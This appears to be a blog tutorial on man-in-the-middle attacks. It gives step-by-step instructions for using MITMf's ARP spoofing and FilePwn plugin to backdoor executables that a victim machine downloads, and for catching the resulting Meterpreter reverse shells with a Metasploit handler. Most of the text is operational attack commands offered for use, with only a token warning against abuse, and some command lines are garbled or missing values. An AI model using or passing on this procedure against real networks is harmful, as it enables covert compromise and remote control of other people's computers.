Man In The Middle Attack Tutorial + video

How It Works

MITMf (if you don’t already know) is a man in the middle attack framwork. MITMf literally stands for “Man In The Middle framework.” It includes many, many different tools to help you with MitM attacks. In this case, we are automatically backdooring every downloaded executable for one specific machine. Cool, eh?

We will be ARP spoofing a Windows 8.1 VM machine in this test.

Note: This only works for HTTP sites, so you might want to use SSLstrip+ for any HTTPS sites.


You will only need MITMf and Metasploit for this attack. You can download it from either the aptitude repository (apt-get install mitmf), or through the GitHub repository (git clone you choose to install via the apt, remember to run apt-get update first.Metasploit is build-in to Kali.

Step 1: Editing the Configurations

Now that we have MITMf installed, we need to edit the config files to match our system. We will edit the config file located in /usr/share/mitmf/config/mitmf.cfg.

Scroll down until you get to the FilePwn section.

You can see that under the CompressedFiles section, there is a configuration for many useful payloads. Set the HOST variable to match your IP, but don’t change the port. Just remember the port number for the payload you want to use.

Step 2: Selecting the Target

When we run MITMf with FilePwn, we want to listen for the payload specific to the target OS. In this case, I’m targeting a Windows 8.1 machine, so I would use WindowsIntelx86. The port number for that is 8443. Remember your payload’s port number for later.

Step 3: Set Up a Listener

We’re going to be using Metasploit as our payload listener. Type use multi/handler and then set your payload. in this case, I’m using Meterpreter.

set PAYLOAD windows/meterpreter/reverse_tcp

Set the LHOST and LPORT options…

set LPORT 8443
(Make sure you set the corresponding port number!)

Then exploit -j. Open up a new terminal…

Step 4: Running the Attack

To run the attack, use the following command:
mitmf –spoof –arp -i <interface> –gateway <gateway IP> –target <target IP> –filepwn

For me it would be:
mitmf –spoof –arp -i wlan0 –gateway –target –filepwn

Pretty soon you should be getting output like this:

If a user downloads a file, and the file is patchable. you should get some output saying “File patched successfully. Sending to target.” if it successfully backdoored. As soon as the victim opens the file, you should get a Meterpreter prompt.

If it doesn’t say it’s patched, it can’t be. Unfortunately, this tactic doesn’t work 100% of the time.


Now we know how to run a very neat trick–backdooring on the fly. This gets even better if you do this via mobile, as you will be very discrete. Don’t abuse this power. As said in the help menu for MITMf quoting Yoda, “Use wisely, young padawan.”



Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s